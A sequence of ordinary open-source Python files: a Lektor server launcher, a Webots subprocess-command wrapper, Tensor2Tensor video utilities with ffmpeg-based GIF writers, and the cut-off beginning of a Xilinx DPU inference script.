def run_server(bindaddr, env, output_path, prune=True, verbosity=0,
lektor_dev=False, ui_lang='en', browse=False, extra_flags=None):
"""This runs a server but also spawns a background process. It's
not safe to call this more than once per python process!
"""
wz_as_main = os.environ.get('WERKZEUG_RUN_MAIN') == 'true'
in_main_process = not lektor_dev or wz_as_main
extra_flags = process_extra_flags(extra_flags)
if in_main_process:
background_builder = BackgroundBuilder(env, output_path=output_path,
prune=prune, verbosity=verbosity,
extra_flags=extra_flags)
background_builder.setDaemon(True)
background_builder.start()
env.plugin_controller.emit('server-spawn', bindaddr=bindaddr,
extra_flags=extra_flags)
app = WebAdmin(env, output_path=output_path, verbosity=verbosity,
debug=lektor_dev, ui_lang=ui_lang,
extra_flags=extra_flags)
dt = None
if lektor_dev and not wz_as_main:
dt = DevTools(env)
dt.start()
if browse:
browse_to_address(bindaddr)
try:
return run_simple(bindaddr[0], bindaddr[1], app,
use_debugger=True, threaded=True,
use_reloader=lektor_dev,
request_handler=not lektor_dev
and SilentWSGIRequestHandler or WSGIRequestHandler)
finally:
if dt is not None:
dt.stop()
if in_main_process:
env.plugin_controller.emit('server-stop')
|
command.py
|
# Copyright 1996-2019 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Launch a system command."""
import os
import subprocess
import sys
import threading
class Command(object):
"""Launch a system command."""
def __init__(self, cmd, ansiEscape=False):
"""Constructor."""
self.ansiEscape = ansiEscape
self.cmd = cmd.split()
self.resetAttributes()
self.mainProcessMutex = threading.Lock()
def resetAttributes(self):
"""Reset the internal attributes."""
self.expectedStringFound = False
self.isTimeout = False
self.mainProcess = None
self.mainThread = None
self.returncode = 0
self.output = ''
def terminate(self, force):
"""Terminate the command."""
self.isRunningFlag = False
if self.mainProcess:
self.mainProcess.terminate()
if force and sys.platform == 'darwin' and self.mainProcess:
self.mainProcess.kill()
def isRunning(self):
"""Detect if the command is running."""
return self.mainProcess is not None
def stopMainProcess(self):
"""Stop the main process."""
if self.mainProcess:
self.mainProcess.terminate()
if self.mainThread:
self.mainThread.join()
self.mainProcess = None
self.mainThread = None
def run(self, timeout=None, expectedString=None, silent=True,
forceTermination=True, shell=False, redirectionFile=None):
"""Run the command and monitor STDERR and STDOUT pipe."""
def mainTarget():
if self.redirectionFile is None:
self.mainProcess = subprocess.Popen(
self.cmd, shell=self.shell, bufsize=1, universal_newlines=True,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
else:
outFile = open(self.redirectionFile, "w")
self.mainProcess = subprocess.Popen(
self.cmd, shell=self.shell, bufsize=1, universal_newlines=True,
stdout=outFile, stderr=outFile)
while self.mainProcess.poll() is None:
self.mainProcess.wait()
self.returncode = self.mainProcess.returncode
with self.mainProcessMutex:
self.mainProcess = None
if self.redirectionFile is not None:
outFile.close()
def outputWriterTarget():
while self.isRunningFlag:
line = ''
with self.mainProcessMutex:
if self.mainProcess:
line = self.mainProcess.stdout.readline() # blocking
if line:
self.output += line
if not self.silent:
if self.ansiEscape:
if line.startswith("OK: "):
line = '\033[92m' + line # green
elif line.startswith("FAILURE"):
line = '\033[91m' + line # red
else:
line = '\033[0m' + line
print(line[:-1])
if sys.platform == 'win32':
sys.stdout.flush()
def outputListenerTarget():
size = 0
while self.isRunningFlag:
if size != len(self.output):
if self.expectedString in self.output:
self.expectedStringFound = True
self.terminate(force=True)
return
size = len(self.output)
self.resetAttributes()
self.expectedString = expectedString
self.silent = silent
self.timeout = timeout
self.shell = shell
self.redirectionFile = redirectionFile
self.isRunningFlag = True
try:
self.outputWriterThread = threading.Thread(
target=outputWriterTarget)
self.outputWriterThread.start()
if expectedString:
self.outputListenerThread = threading.Thread(
target=outputListenerTarget)
self.outputListenerThread.start()
self.mainThread = threading.Thread(target=mainTarget)
self.mainThread.start()
self.mainThread.join(timeout)
self.isRunningFlag = False
if self.mainProcess and self.mainThread.is_alive(): # timeout case
self.isTimeout = True
if forceTermination:
self.stopMainProcess()
except (KeyboardInterrupt, SystemExit):
self.isRunningFlag = False
if self.mainProcess and self.mainThread.is_alive():
self.terminate(force=False)
exit()
def runTest(self, timeout=None, silent=True, forceTermination=True,
shell=False):
"""Run the command and redirect the STDERR and STDOUT to files."""
def mainTarget():
outFile = open(self.outFileName, "w")
errFile = open(self.errFileName, "w")
self.returncode = subprocess.call(self.cmd, shell=shell, bufsize=1,
universal_newlines=True, stdout=outFile, stderr=errFile)
outFile.close()
errFile.close()
self.outFileName = os.environ['WEBOTS_HOME'] + os.sep + 'tests' + os.sep + 'webots_stdout.txt'
self.errFileName = os.environ['WEBOTS_HOME'] + os.sep + 'tests' + os.sep + 'webots_stderr.txt'
self.resetAttributes()
self.silent = silent
self.timeout = timeout
self.isRunningFlag = True
try:
self.mainThread = threading.Thread(target=mainTarget)
self.mainThread.start()
self.mainThread.join(timeout)
self.isRunningFlag = False
if self.mainProcess and self.mainThread.is_alive(): # timeout case
self.isTimeout = True
if forceTermination:
self.stopMainProcess()
except (KeyboardInterrupt, SystemExit):
self.isRunningFlag = False
if self.mainProcess and self.mainThread.is_alive():
self.terminate(force=False)
exit()
|
common_video.py
|
# coding=utf-8
# Copyright 2019 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for video."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensor2tensor.layers import common_layers
import tensorflow as tf
from tensorflow.python.ops import summary_op_util
tfl = tf.layers
tfcl = tf.contrib.layers
def swap_time_and_batch_axes(inputs):
"""Swaps time and batch axis (the first two axis)."""
transposed_axes = tf.concat([[1, 0], tf.range(2, tf.rank(inputs))], axis=0)
return tf.transpose(inputs, transposed_axes)
def encode_to_shape(inputs, shape, scope):
"""Encode the given tensor to given image shape."""
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
w, h = shape[1], shape[2]
x = inputs
x = tfl.flatten(x)
x = tfl.dense(x, w * h, activation=None, name="enc_dense")
x = tf.reshape(x, (-1, w, h, 1))
return x
def decode_to_shape(inputs, shape, scope):
"""Encode the given tensor to given image shape."""
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
x = inputs
x = tfl.flatten(x)
x = tfl.dense(x, shape[2], activation=None, name="dec_dense")
x = tf.expand_dims(x, axis=1)
return x
def basic_lstm(inputs, state, num_units, name=None):
"""Basic LSTM."""
input_shape = common_layers.shape_list(inputs)
# reuse parameters across time-steps.
cell = tf.nn.rnn_cell.BasicLSTMCell(
num_units, name=name, reuse=tf.AUTO_REUSE)
if state is None:
state = cell.zero_state(input_shape[0], tf.float32)
outputs, new_state = cell(inputs, state)
return outputs, new_state
def lstm_cell(inputs,
state,
num_units,
use_peepholes=False,
cell_clip=0.0,
initializer=None,
num_proj=None,
num_unit_shards=None,
num_proj_shards=None,
reuse=None,
name=None):
"""Full LSTM cell."""
input_shape = common_layers.shape_list(inputs)
cell = tf.nn.rnn_cell.LSTMCell(num_units,
use_peepholes=use_peepholes,
cell_clip=cell_clip,
initializer=initializer,
num_proj=num_proj,
num_unit_shards=num_unit_shards,
num_proj_shards=num_proj_shards,
reuse=reuse,
name=name,
state_is_tuple=False)
if state is None:
state = cell.zero_state(input_shape[0], tf.float32)
outputs, new_state = cell(inputs, state)
return outputs, new_state
def conv_lstm_2d(inputs, state, output_channels,
kernel_size=5, name=None, spatial_dims=None):
"""2D Convolutional LSTM."""
input_shape = common_layers.shape_list(inputs)
batch_size, input_channels = input_shape[0], input_shape[-1]
if spatial_dims is None:
input_shape = input_shape[1:]
else:
input_shape = spatial_dims + [input_channels]
cell = tf.contrib.rnn.ConvLSTMCell(
2, input_shape, output_channels,
[kernel_size, kernel_size], name=name)
if state is None:
state = cell.zero_state(batch_size, tf.float32)
outputs, new_state = cell(inputs, state)
return outputs, new_state
def scheduled_sample_count(ground_truth_x,
generated_x,
batch_size,
scheduled_sample_var):
"""Sample batch with specified mix of groundtruth and generated data points.
Args:
ground_truth_x: tensor of ground-truth data points.
generated_x: tensor of generated data points.
batch_size: batch size
scheduled_sample_var: number of ground-truth examples to include in batch.
Returns:
New batch with num_ground_truth sampled from ground_truth_x and the rest
from generated_x.
"""
num_ground_truth = scheduled_sample_var
idx = tf.random_shuffle(tf.range(batch_size))
ground_truth_idx = tf.gather(idx, tf.range(num_ground_truth))
generated_idx = tf.gather(idx, tf.range(num_ground_truth, batch_size))
ground_truth_examps = tf.gather(ground_truth_x, ground_truth_idx)
generated_examps = tf.gather(generated_x, generated_idx)
output = tf.dynamic_stitch([ground_truth_idx, generated_idx],
[ground_truth_examps, generated_examps])
# if batch size is known set it.
if isinstance(batch_size, int):
output.set_shape([batch_size] + common_layers.shape_list(output)[1:])
return output
def inject_additional_input(layer, inputs, name, mode="concat"):
"""Injects the additional input into the layer.
Args:
layer: layer that the input should be injected to.
inputs: inputs to be injected.
name: TF scope name.
mode: how the infor should be added to the layer:
"concat" concats as additional channels.
"multiplicative" broadcasts inputs and multiply them to the channels.
"multi_additive" broadcasts inputs and multiply and add to the channels.
Returns:
updated layer.
Raises:
ValueError: in case of unknown mode.
"""
layer_shape = common_layers.shape_list(layer)
input_shape = common_layers.shape_list(inputs)
zeros_mask = tf.zeros(layer_shape, dtype=tf.float32)
if mode == "concat":
emb = encode_to_shape(inputs, layer_shape, name)
layer = tf.concat(values=[layer, emb], axis=-1)
elif mode == "multiplicative":
filters = layer_shape[-1]
input_reshaped = tf.reshape(inputs, [-1, 1, 1, input_shape[-1]])
input_mask = tf.layers.dense(input_reshaped, filters, name=name)
input_broad = input_mask + zeros_mask
layer *= input_broad
elif mode == "multi_additive":
filters = layer_shape[-1]
input_reshaped = tf.reshape(inputs, [-1, 1, 1, input_shape[-1]])
input_mul = tf.layers.dense(input_reshaped, filters, name=name + "_mul")
layer *= tf.nn.sigmoid(input_mul)
input_add = tf.layers.dense(input_reshaped, filters, name=name + "_add")
layer += input_add
else:
raise ValueError("Unknown injection mode: %s" % mode)
return layer
def scheduled_sample_prob(ground_truth_x,
generated_x,
batch_size,
scheduled_sample_var):
"""Probability based scheduled sampling.
Args:
ground_truth_x: tensor of ground-truth data points.
generated_x: tensor of generated data points.
batch_size: batch size
scheduled_sample_var: probability of choosing from ground_truth.
Returns:
New batch with randomly selected data points.
"""
probability_threshold = scheduled_sample_var
probability_of_generated = tf.random_uniform([batch_size])
return tf.where(probability_of_generated > probability_threshold,
generated_x, ground_truth_x)
def dna_transformation(prev_image, dna_input, dna_kernel_size, relu_shift):
"""Apply dynamic neural advection to previous image.
Args:
prev_image: previous image to be transformed.
dna_input: hidden lyaer to be used for computing DNA transformation.
dna_kernel_size: dna kernel size.
relu_shift: shift for ReLU function.
Returns:
List of images transformed by the predicted CDNA kernels.
"""
# Construct translated images.
prev_image_pad = tf.pad(prev_image, [[0, 0], [2, 2], [2, 2], [0, 0]])
image_height = int(prev_image.get_shape()[1])
image_width = int(prev_image.get_shape()[2])
inputs = []
for xkern in range(dna_kernel_size):
for ykern in range(dna_kernel_size):
inputs.append(
tf.expand_dims(
tf.slice(prev_image_pad, [0, xkern, ykern, 0],
[-1, image_height, image_width, -1]), [3]))
inputs = tf.concat(axis=3, values=inputs)
# Normalize channels to 1.
kernel = tf.nn.relu(dna_input - relu_shift) + relu_shift
kernel = tf.expand_dims(
kernel / tf.reduce_sum(kernel, [3], keep_dims=True), [4])
return tf.reduce_sum(kernel * inputs, [3], keep_dims=False)
def cdna_transformation(prev_image, cdna_input, num_masks, color_channels,
dna_kernel_size, relu_shift):
"""Apply convolutional dynamic neural advection to previous image.
Args:
prev_image: previous image to be transformed.
cdna_input: hidden lyaer to be used for computing CDNA kernels.
num_masks: number of masks and hence the number of CDNA transformations.
color_channels: the number of color channels in the images.
dna_kernel_size: dna kernel size.
relu_shift: shift for ReLU function.
Returns:
List of images transformed by the predicted CDNA kernels.
"""
batch_size = tf.shape(cdna_input)[0]
height = int(prev_image.get_shape()[1])
width = int(prev_image.get_shape()[2])
# Predict kernels using linear function of last hidden layer.
cdna_kerns = tfl.dense(
cdna_input, dna_kernel_size * dna_kernel_size * num_masks,
name="cdna_params",
activation=None)
# Reshape and normalize.
cdna_kerns = tf.reshape(
cdna_kerns, [batch_size, dna_kernel_size, dna_kernel_size, 1, num_masks])
cdna_kerns = (tf.nn.relu(cdna_kerns - relu_shift) + relu_shift)
norm_factor = tf.reduce_sum(cdna_kerns, [1, 2, 3], keep_dims=True)
cdna_kerns /= norm_factor
# Treat the color channel dimension as the batch dimension since the same
# transformation is applied to each color channel.
# Treat the batch dimension as the channel dimension so that
# depthwise_conv2d can apply a different transformation to each sample.
cdna_kerns = tf.transpose(cdna_kerns, [1, 2, 0, 4, 3])
cdna_kerns = tf.reshape(
cdna_kerns, [dna_kernel_size, dna_kernel_size, batch_size, num_masks])
# Swap the batch and channel dimensions.
prev_image = tf.transpose(prev_image, [3, 1, 2, 0])
# Transform image.
transformed = tf.nn.depthwise_conv2d(
prev_image, cdna_kerns, [1, 1, 1, 1], "SAME")
# Transpose the dimensions to where they belong.
transformed = tf.reshape(
transformed, [color_channels, height, width, batch_size, num_masks])
transformed = tf.transpose(transformed, [3, 1, 2, 0, 4])
transformed = tf.unstack(transformed, axis=-1)
return transformed
def vgg_layer(inputs,
nout,
kernel_size=3,
activation=tf.nn.leaky_relu,
padding="SAME",
is_training=True,
has_batchnorm=False,
scope=None):
"""A layer of VGG network with batch norm.
Args:
inputs: image tensor
nout: number of output channels
kernel_size: size of the kernel
activation: activation function
padding: padding of the image
is_training: whether it is training mode or not
has_batchnorm: whether batchnorm is applied or not
scope: variable scope of the op
Returns:
net: output of layer
"""
with tf.variable_scope(scope):
net = tfl.conv2d(inputs, nout, kernel_size=kernel_size, padding=padding,
activation=None, name="conv")
if has_batchnorm:
net = tfl.batch_normalization(net, training=is_training, name="bn")
net = activation(net)
return net
def tile_and_concat(image, latent, concat_latent=True):
"""Tile latent and concatenate to image across depth.
Args:
image: 4-D Tensor, (batch_size X height X width X channels)
latent: 2-D Tensor, (batch_size X latent_dims)
concat_latent: If set to False, the image is returned as is.
Returns:
concat_latent: 4-D Tensor, (batch_size X height X width X channels+1)
latent tiled and concatenated to the image across the channels.
"""
if not concat_latent:
return image
image_shape = common_layers.shape_list(image)
latent_shape = common_layers.shape_list(latent)
height, width = image_shape[1], image_shape[2]
latent_dims = latent_shape[1]
height_multiples = height // latent_dims
pad = height - (height_multiples * latent_dims)
latent = tf.reshape(latent, (-1, latent_dims, 1, 1))
latent = tf.tile(latent, (1, height_multiples, width, 1))
latent = tf.pad(latent, [[0, 0], [pad // 2, pad // 2], [0, 0], [0, 0]])
return tf.concat([image, latent], axis=-1)
def _encode_gif(images, fps):
"""Encodes numpy images into gif string.
Args:
images: A 4-D `uint8` `np.array` (or a list of 3-D images) of shape
`[time, height, width, channels]` where `channels` is 1 or 3.
fps: frames per second of the animation
Returns:
The encoded gif string.
Raises:
IOError: If the ffmpeg command returns an error.
"""
writer = WholeVideoWriter(fps)
writer.write_multi(images)
return writer.finish()
def ffmpeg_works():
"""Tries to encode images with ffmpeg to check if it works."""
images = np.zeros((2, 32, 32, 3), dtype=np.uint8)
try:
_encode_gif(images, 2)
return True
except (IOError, OSError):
return False
def py_gif_summary(tag, images, max_outputs, fps, return_summary_value=False):
"""Outputs a `Summary` protocol buffer with gif animations.
Args:
tag: Name of the summary.
images: A 5-D `uint8` `np.array` of shape `[batch_size, time, height, width,
channels]` where `channels` is 1 or 3.
max_outputs: Max number of batch elements to generate gifs for.
fps: frames per second of the animation.
return_summary_value: If set to True, return a list of tf.Summary.Value
objects in addition to the protocol buffer.
Returns:
The serialized `Summary` protocol buffer.
Raises:
ValueError: If `images` is not a 5-D `uint8` array with 1 or 3 channels.
"""
images = np.asarray(images)
if images.dtype != np.uint8:
raise ValueError("Tensor must have dtype uint8 for gif summary.")
if images.ndim != 5:
raise ValueError("Tensor must be 5-D for gif summary.")
batch_size, _, height, width, channels = images.shape
if channels not in (1, 3):
raise ValueError("Tensors must have 1 or 3 channels for gif summary.")
summ = tf.Summary()
all_summ_values = []
num_outputs = min(batch_size, max_outputs)
for i in range(num_outputs):
image_summ = tf.Summary.Image()
image_summ.height = height
image_summ.width = width
image_summ.colorspace = channels # 1: grayscale, 3: RGB
try:
image_summ.encoded_image_string = _encode_gif(images[i], fps)
except (IOError, OSError) as e:
tf.logging.warning(
"Unable to encode images to a gif string because either ffmpeg is "
"not installed or ffmpeg returned an error: %s. Falling back to an "
"image summary of the first frame in the sequence.", e)
try:
from PIL import Image # pylint: disable=g-import-not-at-top
import io # pylint: disable=g-import-not-at-top
with io.BytesIO() as output:
Image.fromarray(images[i][0]).save(output, "PNG")
image_summ.encoded_image_string = output.getvalue()
except ImportError as e:
tf.logging.warning(
"Gif summaries requires ffmpeg or PIL to be installed: %s", e)
image_summ.encoded_image_string = ""
if num_outputs == 1:
summ_tag = "{}/gif".format(tag)
else:
summ_tag = "{}/gif/{}".format(tag, i)
curr_summ_value = tf.Summary.Value(tag=summ_tag, image=image_summ)
all_summ_values.append(curr_summ_value)
summ.value.add(tag=summ_tag, image=image_summ)
summ_str = summ.SerializeToString()
if return_summary_value:
return all_summ_values, summ_str
return summ_str
def gif_summary(name, tensor, max_outputs=3, fps=10, collections=None,
family=None):
"""Outputs a `Summary` protocol buffer with gif animations.
Args:
name: Name of the summary.
tensor: A 5-D `uint8` `Tensor` of shape `[batch_size, time, height, width,
channels]` where `channels` is 1 or 3.
max_outputs: Max number of batch elements to generate gifs for.
fps: frames per second of the animation
collections: Optional list of tf.GraphKeys. The collections to add the
summary to. Defaults to [tf.GraphKeys.SUMMARIES]
family: Optional; if provided, used as the prefix of the summary tag name,
which controls the tab name used for display on Tensorboard.
Returns:
A scalar `Tensor` of type `string`. The serialized `Summary` protocol
buffer.
Raises:
ValueError: if the given tensor has the wrong shape.
"""
tensor = tf.convert_to_tensor(tensor)
if len(tensor.get_shape()) != 5:
raise ValueError("Assuming videos given as tensors in the format "
"[batch, time, height, width, channels] but got one "
"of shape: %s" % str(tensor.get_shape()))
tensor = tf.cast(tensor, tf.uint8)
if summary_op_util.skip_summary():
return tf.constant("")
with summary_op_util.summary_scope(
name, family, values=[tensor]) as (tag, scope):
val = tf.py_func(
py_gif_summary,
[tag, tensor, max_outputs, fps],
tf.string,
stateful=False,
name=scope)
summary_op_util.collect(val, collections, [tf.GraphKeys.SUMMARIES])
return val
def tinyify(array, tiny_mode, small_mode):
if tiny_mode:
return [1 for _ in array]
if small_mode:
return [max(x // 4, 1) for x in array]
return array
def get_gaussian_tensor(mean, log_var):
z = tf.random_normal(tf.shape(mean), 0, 1, dtype=tf.float32)
z = mean + tf.exp(log_var / 2.0) * z
return z
def conv_latent_tower(images, time_axis, latent_channels=1, min_logvar=-5,
is_training=False, random_latent=False,
tiny_mode=False, small_mode=False):
"""Builds convolutional latent tower for stochastic model.
At training time this tower generates a latent distribution (mean and std)
conditioned on the entire video. This latent variable will be fed to the
main tower as an extra variable to be used for future frames prediction.
At inference time, the tower is disabled and only returns latents sampled
from N(0,1).
If the multi_latent flag is on, a different latent for every timestep would
be generated.
Args:
images: tensor of ground truth image sequences
time_axis: the time axis in images tensor
latent_channels: number of latent channels
min_logvar: minimum value for log_var
is_training: whether or not it is training mode
random_latent: whether or not generate random latents
tiny_mode: whether or not it is tiny_mode. tiny_mode sets the number
of conv channels to 1 at each layer. useful for testing the
integration tests.
small_mode: whether or not it is small_mode. small mode is the same model
with less conv and lstm layers and also lower number of channels.
suitable for videos with less complexity and testing.
Returns:
latent_mean: predicted latent mean
latent_logvar: predicted latent log variance
"""
conv_size = tinyify([32, 64, 64], tiny_mode, small_mode)
with tf.variable_scope("latent", reuse=tf.AUTO_REUSE):
images = tf.to_float(images)
images = tf.unstack(images, axis=time_axis)
images = tf.concat(images, axis=3)
x = images
x = common_layers.make_even_size(x)
x = tfl.conv2d(x, conv_size[0], [3, 3], strides=(2, 2),
padding="SAME", activation=tf.nn.relu, name="latent_conv1")
x = tfcl.layer_norm(x)
if not small_mode:
x = tfl.conv2d(x, conv_size[1], [3, 3], strides=(2, 2),
padding="SAME", activation=tf.nn.relu, name="latent_conv2")
x = tfcl.layer_norm(x)
x = tfl.conv2d(x, conv_size[2], [3, 3], strides=(1, 1),
padding="SAME", activation=tf.nn.relu, name="latent_conv3")
x = tfcl.layer_norm(x)
nc = latent_channels
mean = tfl.conv2d(x, nc, [3, 3], strides=(2, 2),
padding="SAME", activation=None, name="latent_mean")
logv = tfl.conv2d(x, nc, [3, 3], strides=(2, 2),
padding="SAME", activation=tf.nn.relu, name="latent_std")
logvar = logv + min_logvar
# No latent tower at inference time, just standard gaussian.
if not is_training:
return tf.zeros_like(mean), tf.zeros_like(logvar)
# No latent in the first phase
ret_mean, ret_logvar = tf.cond(
random_latent,
lambda: (tf.zeros_like(mean), tf.zeros_like(logvar)),
lambda: (mean, logvar))
return ret_mean, ret_logvar
def beta_schedule(schedule, global_step, final_beta, decay_start, decay_end):
"""Get KL multiplier (beta) based on the schedule."""
if decay_start > decay_end:
raise ValueError("decay_end is smaller than decay_end.")
# Since some of the TF schedules do not support incrementing a value,
# in all of the schedules, we anneal the beta from final_beta to zero
# and then reverse it at the bottom.
if schedule == "constant":
decayed_value = 0.0
elif schedule == "linear":
decayed_value = tf.train.polynomial_decay(
learning_rate=final_beta,
global_step=global_step - decay_start,
decay_steps=decay_end - decay_start,
end_learning_rate=0.0)
elif schedule == "noisy_linear_cosine_decay":
decayed_value = tf.train.noisy_linear_cosine_decay(
learning_rate=final_beta,
global_step=global_step - decay_start,
decay_steps=decay_end - decay_start)
# TODO(mechcoder): Add log_annealing schedule.
else:
raise ValueError("Unknown beta schedule.")
increased_value = final_beta - decayed_value
increased_value = tf.maximum(0.0, increased_value)
beta = tf.case(
pred_fn_pairs={
tf.less(global_step, decay_start): lambda: 0.0,
tf.greater(global_step, decay_end): lambda: final_beta},
default=lambda: increased_value)
return beta
def extract_random_video_patch(videos, num_frames=-1):
"""For every video, extract a random consecutive patch of num_frames.
Args:
videos: 5-D Tensor, (NTHWC)
num_frames: Integer, if -1 then the entire video is returned.
Returns:
video_patch: 5-D Tensor, (NTHWC) with T = num_frames.
Raises:
ValueError: If num_frames is greater than the number of total frames in
the video.
"""
if num_frames == -1:
return videos
batch_size, num_total_frames, h, w, c = common_layers.shape_list(videos)
if num_total_frames < num_frames:
raise ValueError("Expected num_frames <= %d, got %d" %
(num_total_frames, num_frames))
# Randomly choose start_inds for each video.
frame_start = tf.random_uniform(
shape=(batch_size,), minval=0, maxval=num_total_frames - num_frames + 1,
dtype=tf.int32)
# [start[0], start[0] + 1, ... start[0] + num_frames - 1] + ...
# [start[batch_size-1], ... start[batch_size-1] + num_frames - 1]
range_inds = tf.expand_dims(tf.range(num_frames), axis=0)
frame_inds = range_inds + tf.expand_dims(frame_start, axis=1)
frame_inds = tf.reshape(frame_inds, [-1])
# [0]*num_frames + [1]*num_frames + ... [batch_size-1]*num_frames
batch_inds = tf.expand_dims(tf.range(batch_size), axis=1)
batch_inds = tf.tile(batch_inds, [1, num_frames])
batch_inds = tf.reshape(batch_inds, [-1])
gather_inds = tf.stack((batch_inds, frame_inds), axis=1)
video_patches = tf.gather_nd(videos, gather_inds)
return tf.reshape(video_patches, (batch_size, num_frames, h, w, c))
class VideoWriter(object):
"""Base helper class for writing videos."""
def write(self, frame, encoded_frame=None):
"""Writes a single video frame."""
raise NotImplementedError
def write_multi(self, frames, encoded_frames=None):
"""Writes multiple video frames."""
if encoded_frames is None:
# Infinite iterator.
encoded_frames = iter(lambda: None, 1)
for (frame, encoded_frame) in zip(frames, encoded_frames):
self.write(frame, encoded_frame)
def finish(self):
"""Finishes writing frames and returns output, if any.
Frees any resources acquired by the writer.
"""
pass
def save_to_disk(self, output):
"""Saves output to disk.
Args:
output: result of finish().
"""
raise NotImplementedError
def finish_to_disk(self):
"""Finishes writing frames and saves output to disk, if any."""
output = self.finish() # pylint: disable=assignment-from-no-return
if output is not None:
self.save_to_disk(output)
def __del__(self):
"""Frees any resources acquired by the writer."""
self.finish()
class WholeVideoWriter(VideoWriter):
"""Helper class for writing whole videos."""
def __init__(self, fps, output_path=None, file_format="gif"):
self.fps = fps
self.output_path = output_path
self.file_format = file_format
self.proc = None
self._out_chunks = []
self._err_chunks = []
self._out_thread = None
self._err_thread = None
def __init_ffmpeg(self, image_shape):
"""Initializes ffmpeg to write frames."""
import itertools # pylint: disable=g-import-not-at-top
from subprocess import Popen, PIPE # pylint: disable=g-import-not-at-top,g-multiple-import,g-importing-member
ffmpeg = "ffmpeg"
height, width, channels = image_shape
self.cmd = [
ffmpeg, "-y",
"-f", "rawvideo",
"-vcodec", "rawvideo",
"-r", "%.02f" % self.fps,
"-s", "%dx%d" % (width, height),
"-pix_fmt", {1: "gray", 3: "rgb24"}[channels],
"-i", "-",
"-filter_complex", "[0:v]split[x][z];[x]fifo[w];[z]palettegen,fifo[y];"
"[w][y]paletteuse,fifo",
"-r", "%.02f" % self.fps,
"-f", self.file_format,
"-qscale", "0",
"-"
]
self.proc = Popen(
self.cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE, bufsize=-1
)
(self._out_thread, self._err_thread) = itertools.starmap(
self._start_reader_thread, [
(self.proc.stdout, self._out_chunks),
(self.proc.stderr, self._err_chunks)
]
)
def _start_reader_thread(self, stream, chunks):
"""Starts a thread for reading output from FFMPEG.
The thread reads consecutive chunks from the stream and saves them in
the given list.
Args:
stream: output stream of the FFMPEG process.
chunks: list to save output chunks to.
Returns:
Thread
"""
import io # pylint: disable=g-import-not-at-top
import threading # pylint: disable=g-import-not-at-top
def target():
while True:
chunk = stream.read(io.DEFAULT_BUFFER_SIZE)
if not chunk:
break
chunks.append(chunk)
thread = threading.Thread(target=target)
thread.start()
return thread
def write(self, frame, encoded_frame=None):
if self.proc is None:
self.__init_ffmpeg(frame.shape)
self.proc.stdin.write(frame.tostring())
def finish(self):
"""Finishes transconding and returns the video.
Returns:
bytes
Raises:
IOError: in case of transcoding error.
"""
if self.proc is None:
return None
self.proc.stdin.close()
for thread in (self._out_thread, self._err_thread):
thread.join()
(out, err) = [
b"".join(chunks) for chunks in (self._out_chunks, self._err_chunks)
]
if self.proc.returncode:
err = "\n".join([" ".join(self.cmd), err.decode("utf8")])
raise IOError(err)
del self.proc
self.proc = None
return out
def save_to_disk(self, output):
if self.output_path is None:
raise ValueError(
"This writer doesn't support saving to disk (output_path not "
"specified)."
)
with tf.gfile.Open(self.output_path, "w") as f:
f.write(output)
class BatchWholeVideoWriter(VideoWriter):
"""Helper class for writing videos in batch."""
def __init__(self, fps, path_template, file_format="gif"):
self.fps = fps
self.path_template = path_template
self.file_format = file_format
self.writers = None
def write(self, batch_frame, batch_encoded_frame=None):
del batch_encoded_frame
if self.writers is None:
self.writers = [
WholeVideoWriter(
self.fps, self.path_template.format(i), self.file_format
)
for i in range(len(batch_frame))
]
for i, frame in enumerate(batch_frame):
self.writers[i].write(frame)
def finish(self):
outs = [w.finish() for w in self.writers]
return outs
def save_to_disk(self, outputs):
for (writer, output) in zip(self.writers, outputs):
writer.save_to_disk(output)
class IndividualFrameWriter(VideoWriter):
"""Helper class for writing individual video frames."""
def __init__(self, output_dir):
self.output_dir = output_dir
self._counter = 0
def write(self, frame=None, encoded_frame=None):
import os # pylint: disable=g-import-not-at-top
if encoded_frame is None:
raise ValueError("This writer only supports encoded frames.")
path = os.path.join(self.output_dir, "frame_%05d.png" % self._counter)
with tf.gfile.Open(path, "wb") as f:
f.write(encoded_frame)
self._counter += 1
|
app_mt.py
|
'''
Copyright 2020 Xilinx Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from ctypes import *
import cv2
import numpy as np
import runner
import os
import math
import threading
import time
import sys
import argparse
def preprocess_fn(image_path):
'''
Image pre-processing.
Rearranges from BGR to RGB then normalizes to range 0:1
input arg: path of image file
return: numpy array
'''
image = cv2.imread(image_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = image/255.0
return image
def runDPU(id,start,dpu,img):
'''get tensor'''
inputTensors = dpu.get_input_tensors()
outputTensors = dpu.get_output_tensors()
tensorformat = dpu.get_tensor_format()
if tensorformat == dpu.TensorFormat.NCHW:
outputHeight = outputTensors[0].dims[2]
outputWidth = outputTensors[0].dims[3]
outputChannel = outputTensors[0].dims[1]
elif tensorformat == dpu.TensorFormat.NHWC:
outputHeight = outputTensors[0].dims[1]
outputWidth = outputTensors[0].dims[2]
outputChannel = outputTensors[0].dims[3]
else:
exit("Format error")
outputSize = outputHeight*outputWidth*outputChannel
batchSize = inputTensors[0].dims[0]
n_of_images = len(img)
count = 0
write_index = start
while count < n_of_images:
if (count+batchSize<=n_of_images):
runSize = batchSize
else:
